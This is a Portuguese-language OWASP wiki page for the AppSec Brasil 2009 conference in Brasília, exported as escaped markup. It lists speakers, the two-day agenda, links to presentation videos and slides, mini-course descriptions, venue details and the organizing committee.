Jerry Hoff é engenheiro senior de segurança de aplicações na Aspect Security. Jerry coordena e executa numerosas revisões de segurança em código de aplicações para clientes de diversas industrias. Jerry também fornece treinamentos para clientes e possui mais de 10 anos de experiência ensinando e desenvolvendo. Jerry também é envolvido com a OWASP e foi o líder do projeto AntiSamy .net. Ele possui mestrado em Ciências da Computação pela Universidade de Washington em St. Louis. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Dinis Cruz''' &lt;br /&gt;
&lt;br /&gt;
OWASP Board &lt;br /&gt;
&lt;br /&gt;
''Título:'' '''A Definir''' &lt;br /&gt;
&lt;br /&gt;
''Biografia:'' &lt;br /&gt;
&lt;br /&gt;
A definir. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Kuai Hinojosa''' &lt;br /&gt;
&lt;br /&gt;
OWASP &lt;br /&gt;
&lt;br /&gt;
''Título:'' '''Implementando Aplicações Web Seguras Usando Recursos do OWASP''' &lt;br /&gt;
&lt;br /&gt;
''Biografia:'' &lt;br /&gt;
&lt;br /&gt;
Kuai Hinojosa desenvolve e protege aplicações Web por mais de 12 anos. Anteriormente, ele trabalhou no setor bancário como administrador de segurança de base de dados para o quinto maior banco dos Estados Unidos, onde ele trabalhou em um pequeno time de desenvolvimento de aplicações para proteção dos ativos da empresa. Ele trabalha agora na Universidade de Nova Yorque como Especialista de Aplicações Web onde ele continua a empregar o desenvolvimento de aplicações Web e a experiência em segurança de aplicações para proteger os recursos da universidade. Em seu tempo livre, Kuai se voluntaria para catequisar sermões de segurança de aplicações and liderar o capítulo de Mineapolis da OWASP. Kuai é membro do Comitê Global de Edução da OWASP. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Agenda  ====&lt;br /&gt;
&lt;br /&gt;
'''Programa da Conferência - Dia 1 - 29 de outubro de 2009 ''' &lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
{| width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 08:30 - 09:00 &lt;br /&gt;
| bgcolor=&amp;quot;#8595c2&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Recepção'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 09:00 - 10:00 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Abertura'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;49&amp;quot; align=&amp;quot;right&amp;quot; | 10:00 - 10:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Dinis Cruz&amp;lt;br&amp;gt;''' Apresentação do Projeto OWASP&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 12:30 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Gary McGraw (Cigital)&amp;lt;br&amp;gt;''' Modelo de Maturidade Building Security In (BSIMM)&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 12:30 - 14:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Almoço'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 14:00 - 14:50 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Dinis Cruz&amp;lt;br&amp;gt;''' Apanhado dos Projetos do OWASP&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 14:50 - 15:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Thomas Schreiber&amp;lt;br&amp;gt;''' As Camadas Lógica e Semântica da Segurança de Aplicações Web&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 15:40 - 16:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Break'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 16:00 - 16:50 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Brian Contos&amp;lt;br&amp;gt;''' O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 16:50 - 17:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Matt Tesauro&amp;lt;br&amp;gt;''' ROI: Otimize os Gastos com Segurança&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 17:40 - 18:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Pravir Chandra &amp;lt;br&amp;gt;''' O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)”&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 18:30 - 18:35 &lt;br /&gt;
| bgcolor=&amp;quot;#cccccc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Encerramento do Primeiro Dia'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Programa da Conferência - Dia 2 - 30 de outubro de 2009''' &lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
{| width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 08:30 - 09:00 &lt;br /&gt;
| bgcolor=&amp;quot;#8595c2&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Recepção'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 09:00 - 10:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Jason Li e Jerry Hoff (Aspect Security) '''&amp;lt;br&amp;gt; Ágil e Seguro - É possível fazer os dois?&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 10:30 - 10:50 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Intervalo'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;47&amp;quot; align=&amp;quot;right&amp;quot; | 10:50 - 11:40 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Cassio Goldschmidt'''&amp;lt;br&amp;gt; Praticas e ferramentas fundamentais para o desenvolvimento de software seguro&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 11:40 - 12:30 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Luiz Otávio Duarte'''&amp;lt;br&amp;gt; Abordagem Preventiva para Teste de Segurança em Aplicações Web&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 12:30 - 14:00 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Almoço'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 14:00 - 15:10 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Ulisses Castro'''&amp;lt;br&amp;gt;SQL Injection: Amplifying Data Leakeage&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 15:10 - 16:00 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Sebastian Cufre'''&amp;lt;br&amp;gt; Técnicas Automáticas para “SQL Ownage”&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 16:00 - 16:20 &lt;br /&gt;
| bgcolor=&amp;quot;#d98b66&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Intervalo'''&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 16:20 - 17:10 &lt;br /&gt;
| bgcolor=&amp;quot;#eeeeee&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Klaubert Herr da Silveira'''&amp;lt;br&amp;gt; ModSecurity: Firewall OpenSource para Aplicações Web (WAF)&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;32&amp;quot; align=&amp;quot;right&amp;quot; | 17:10 - 18:00 &lt;br /&gt;
| bgcolor=&amp;quot;#b9c2dc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Philippe Sevestre'''&amp;lt;br&amp;gt; Programação Segura utilizando Análise Estática&lt;br /&gt;
|-&lt;br /&gt;
| width=&amp;quot;14%&amp;quot; height=&amp;quot;17&amp;quot; align=&amp;quot;right&amp;quot; | 18:00 - 18:30 &lt;br /&gt;
| bgcolor=&amp;quot;#cccccc&amp;quot; align=&amp;quot;CENTER&amp;quot; | '''Encerramento'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;/center&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Arquivos das Apresentações  ====&lt;br /&gt;
&lt;br /&gt;
'''Vídeos completos''' &lt;br /&gt;
&lt;br /&gt;
dia 1 (29/10): http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-09-18-00-000_36000000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0 &lt;br /&gt;
&lt;br /&gt;
dia 2 (30/10): http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-09-00-00-000_36000000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Apresentações''' &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Abertura &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-09-18-00-000_2730000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461881&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Dinis Cruz, ''Apresentação do Projeto OWASP'' &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-10-03-00-000_1300000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7482554&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Gary McGraw, ''O Modelo de Maturidade Building Security In'' &amp;lt;br&amp;gt; Transparências: [[Media:Bsimm09.pdf]] &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-10-25-00-000_7070000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7476912&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Dinis Cruz, ''Apanhado dos Projetos do OWASP'' &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-14-08-00-000_2800000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0&amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7506297&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Brian Contos, ''O Uso de Web Application Firewalls (WAF) e Sistemas de Database Activity Monitoring (DAM) Para Melhorar a Segurança de Código'' &amp;lt;br&amp;gt; Transparências: [[Media:OWASP_Brian_Contos_Making_a_Case_for_Data_Security_to_Network-Centric_Peers_and_Managers_October2009_Final.zip]] &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-14-56-00-000_3300000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0&amp;lt;br&amp;gt;Vídeo: http://vimeo.com/7505808&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Dinis Cruz, ''O Projeto O2'' &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-16-05-00-000_3300000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0 &amp;lt;br&amp;gt;Vide: http://vimeo.com/7506929&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Matt Tesauro, ''ROI: Otimize os Gastos com Segurança'' &amp;lt;br&amp;gt; Transparências: [[Media:AppSec_Brazil_OWASP_ROI-mtesauro.pdf]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-17-03-00-000_2700000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461624 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Pravir Chandra, ''O Modelo de Maturidade “Software Assurance Maturity Model (SAMM)'' &amp;lt;br&amp;gt; Transparências: http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-29-17-48-00-000_2750000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461495 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Jerry Hoff, ''Ágil e Seguro - É possível fazer os dois?'' &amp;lt;br&amp;gt; Transparências: [[Media:Jerry.Hoff.brazil_presentation.pdf]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-09-21-00-000_2620000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461340 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Cassio Goldschmidt, ''Práticas e ferramentas fundamentais para o desenvolvimento de software seguro'' &amp;lt;br&amp;gt; Transparências: [[Media:Praticas_e_ferramentas_fundamentais_para_o_desenvolvimento_de_software_seguro_-_AppSec_Brasil.pptx]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-10-35-00-000_3500000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461207 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Luiz Otávio Duarte, ''Abordagem Preventiva para Teste de Segurança em Aplicações Web'' &amp;lt;br&amp;gt; Transparências: [[Media:AprOwasp_LOD_FER_WAL_NewVersion.pdf]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-11-34-00-000_3650000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7460959 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Ulisses Castro, ''SQL Injection: Amplificação de Data Leakage'' &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-14-02-00-000_2300000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7460521 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Gary McGraw, ''Exploiting Online Games'' &amp;lt;br&amp;gt; Transparências: [[Media:EOG09.pdf]] &amp;lt;br&amp;gt; Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-14-41-00-000_3000000&amp;amp;amp;d=1&amp;amp;amp;i=1&amp;amp;amp;v=0&amp;lt;br&amp;gt;Vídeo: http://vimeo.com/7507515&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Sebastián Cufre, ''Técnicas Automáticas para “SQL Ownage”'' &amp;lt;br&amp;gt; Transparências: [[Media:OWASP_Brasil_2009_-_Automated_SQL_Ownage_Techniques.pptx]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-15-35-00-000_2450000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7462181 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Anúncio do AppSec Brasil 2010 &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-16-16-00-000_120000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461914 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Klaubert Herr da Silveira, ''ModSecurity: Firewall OpenSource para Aplicações Web'' &amp;lt;br&amp;gt; Transparências: [[Media:OWASP_BSB_ModSecurity_Klaubert-Herr.ppt]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-16-30-00-000_3520000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7462060 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Philippe Sevestre, ''Programação Segura utilizando Análise Estática'' &amp;lt;br&amp;gt; Transparências: [[Media:AppSec_Brasil_2009-SecureProgrammingWithStaticAnalysis.pdf]] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Vídeo: http://vod.camara.gov.br/cgi-bin/playlist.pl?p=auditorio1_2009-10-30-17-42-00-000_2850000&amp;amp;amp;amp;d=1&amp;amp;amp;amp;i=1&amp;amp;amp;amp;v=0 &amp;lt;br&amp;gt; Vídeo: http://vimeo.com/7461756 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Mini-Cursos  ====&lt;br /&gt;
&lt;br /&gt;
'''Gestão de Riscos de Segurança Aplicada a Web Services''' &lt;br /&gt;
&lt;br /&gt;
''José Eduardo Malta de Sá Brandão'', IPEA &lt;br /&gt;
&lt;br /&gt;
Transparências: [[Media:Owasp2009_brandao.ppt]] &lt;br /&gt;
&lt;br /&gt;
O objetivo deste minicurso é apresentar a disciplina de gestão de riscos de segurança associada a web Services. O enfoque do curso visa elucidar aspectos conceituais e sistemáticos nestas metodologias, exemplificado em um estudo de caso que visa reforçar a utilidade e necessidade do uso destas metodologias para o entendimento e o desenvolvimento de web services. O curso deverá fornecer aos alunos base para desenvolverem seus próprios projetos de gestão de riscos. As apresentações deverão discorres sobre conceitos, descrição de modelos e na comparação dos principais padrões relacionados à gestão de riscos na segurança. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Segurança  Web:  Técnicas  para  Programação  Segura  de  Aplicações''' &lt;br /&gt;
&lt;br /&gt;
''André Ricardo Abed Grégio e Vitor Monte Afonso'', CTI/MCT, ''Paulo Licio de Geus'', IC/UNICAMP &lt;br /&gt;
&lt;br /&gt;
Transparências: [[Media:AppSecBR2009_VAfonso_AGregio_PGeus.pdf]] &lt;br /&gt;
&lt;br /&gt;
O treinamento visa apresentar os princípios e técnicas de programação segura, principalmente programação de aplicações Web, abordando conceitos fundamentais da área, detalhando as vulnerabilidades possíveis de serem exploradas e com foco nos métodos de mitigação destas falhas. São abordados exemplos práticos de como corrigir vulnerabilidades baseadas no OWASP top 10 em diferentes linguagens de programação, com trechos de código vulnerável de aplicações Web retirados de revisões de código realizadas pelos autores. São apresentadas também algumas ferramentas para detecção de ataques e testes de vulnerabilidades em aplicações Web. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Segurança&amp;amp;nbsp;Computacional&amp;amp;nbsp;no&amp;amp;nbsp;Desenvolvimento&amp;amp;nbsp;de&amp;amp;nbsp;Web&amp;amp;nbsp;Services''' &lt;br /&gt;
&lt;br /&gt;
''Júlio Cesar Estrella et al'', ICMC/USP &lt;br /&gt;
&lt;br /&gt;
Transparências: [[Media:AppSec_Brasil_2009_Web_Services_Security.pdf]]&lt;br /&gt;
&lt;br /&gt;
Este minicurso apresenta o desenvolvimento de aplicações distribuídas utilizando o conceito de SOA levando em consideração os aspectos de segurança computacional. Para o desenvolvimento das aplicações clientes e servidoras serão considerados o uso da engine Apache Axis2. São abordados os componentes básicos do Axis2, os tipos e modelos de invocação de Web Services bem como suas principais características. Dois padrões de segurança para a construção de Web Services são abordadas no contexto da engine Apache Axis2: WS-Security e SAML. A metodologia utilizada para este minicurso envolve a utilização de tópicos expositivos e de exercícios práticos, abordando os conceitos fundamentais da engine Axis2, e a construção de aplicações reais com foco em segurança. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Tecnologias de Segurança em Web Services''' &lt;br /&gt;
&lt;br /&gt;
''Eduardo Takeo Ueda e Wilson Vicente Ruggiero'', Poli/USP &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; Devido a sua característica de integração e por fazer uso de padrões abertos, os web services se tornaram uma área de grande interesse para acadêmicos e a indústria nos últimos anos. Inicialmente, pretendemos introduzir aos participantes os conceitos básicos da arquitetura orientada a serviços, com o intuito do treinamento ser auto-suficiente. Posteriormente serão apresentados os principais padrões e especificações de segurança que estão sendo desenvolvidos e devem ser adotados em web services. Por fim, o treinamento culmina com a exposição e caracterização de desafios atuais em segurança de web services. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Hands on Web Application Testing using the OWASP Testing Guide.''' &lt;br /&gt;
&lt;br /&gt;
''Matt Tesauro'', OWASP &lt;br /&gt;
&lt;br /&gt;
Transparências: [[Media:Matt.tesauro.hands.on.zip]] &lt;br /&gt;
&lt;br /&gt;
O treinamento irá cobrir as áreas críticas do teste de aplicações Web utilizando o Guia de Testes (Testing Guide) da OWASP v3, como framework de testes de aplicação, e o OWASP Live CD, com as ferramentas para realizar os testes. Uma versão customizada do OWASP Live CD irá ser criada para o treinamento. Ela irá incluir um ambiente controlado de testes oferecendo aplicações vulneráveis de forma que tanto as ferramentas e as aplicações para testar as ferramentas serão incluídas. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Local  ====&lt;br /&gt;
&lt;br /&gt;
'''Local das plenárias''' &lt;br /&gt;
&lt;br /&gt;
[[Image:CongressoNacional.jpg|The Palácio do Congresso building]] &lt;br /&gt;
&lt;br /&gt;
O evento será na Câmara dos Deputados em Brasília, DF, Brasil no endereço: Auditório Nereu Ramos, Câmara dos Deputados - Anexo II, Praça dos Três Poderes. &lt;br /&gt;
&lt;br /&gt;
Veja a localização no [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;q=anexo+II,+camara+dos+deputados,+brasilia&amp;amp;sll=37.0625,-95.677068&amp;amp;sspn=43.934478,79.101563&amp;amp;ie=UTF8&amp;amp;t=h&amp;amp;ll=-15.800058,-47.865822&amp;amp;spn=0.01309,0.019312&amp;amp;z=16 Google Maps] &lt;br /&gt;
&lt;br /&gt;
''Como chegar ao local da Conferência'' &lt;br /&gt;
&lt;br /&gt;
A definir &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; '''Local dos Mini-cursos''' &lt;br /&gt;
&lt;br /&gt;
Os mini-cursos ocorrerão no Centro de Formação, Treinamento e Aperfeiçoamento da Câmara dos Deputados, localizado na via N3, Projeção L, Setor de Garagens Ministeriais Norte, Complexo Avançado da Câmara dos Deputados, Bloco B. Veja a localização no [http://maps.google.com.br/maps/ms?ie=UTF8&amp;amp;hl=pt-BR&amp;amp;msa=0&amp;amp;ll=-15.793895,-47.864009&amp;amp;spn=0.005017,0.006866&amp;amp;t=h&amp;amp;z=17&amp;amp;msid=106468407154665154285.0004577c477849eda80f3 mapa]. &lt;br /&gt;
&lt;br /&gt;
''Como chegar ao local dos Mini-cursos'' &lt;br /&gt;
&lt;br /&gt;
Estamos verificando a possibilidade de haver transporte de algum ponto da Esplanada dos Ministérios até o local dos mini-cursos. Assim que tivermos mais informações, divulgaremos nesta página. &lt;br /&gt;
&lt;br /&gt;
Para ir de táxi, mostre o mapa acima para o motorista. É pouco provável que o motorista consiga chegar apenas com o endereço do local. &lt;br /&gt;
&lt;br /&gt;
Não aconselhamos ir de carro, pois há séria dificuldade em encontrar vagas para estacionar na região do Congresso e Ministérios. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Organização  ====&lt;br /&gt;
&lt;br /&gt;
'''Comitês''' &lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org &lt;br /&gt;
&lt;br /&gt;
2009 AppSec Brasil - Comitê de Programa (appsec.brasil@camara.gov.br): &lt;br /&gt;
&lt;br /&gt;
*Coordenador Geral: Lucas C. Ferreira (lucas.ferreira at owasp.org) &lt;br /&gt;
*Coordenador de Tutoriais: Eduardo V. C. Neves (eduardo.neves at owasp.org) &lt;br /&gt;
*Coordenador do Programa: Wagner Elias (wagner.elias at owasp.org)&lt;br /&gt;
&lt;br /&gt;
Equipe Organizadora &lt;br /&gt;
&lt;br /&gt;
*Cassio Goldschmidt (cassio 'at' owasp.org) &lt;br /&gt;
*Kuai Hinojosa (kuai.hinojosa 'at' owasp.org) &lt;br /&gt;
*Leonardo Cavallari - (leo.cavallari 'at' owasp.org) &lt;br /&gt;
*Thiago Lechuga (thiagoalz 'at' gmail.com) &lt;br /&gt;
*Dinis Cruz (dinis.cruz 'at' owasp.org)&lt;br /&gt;
&lt;br /&gt;
==== Links  ====&lt;br /&gt;
&lt;br /&gt;
Página do evento no LinkedIn: http://events.linkedin.com/OWASP-AppSec-Brasil/pub/65160 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_AppSec_Conference]]&lt;/div&gt;</summary>
		<author><name>Ulisses Castro</name></author>	</entry>

	<entry>
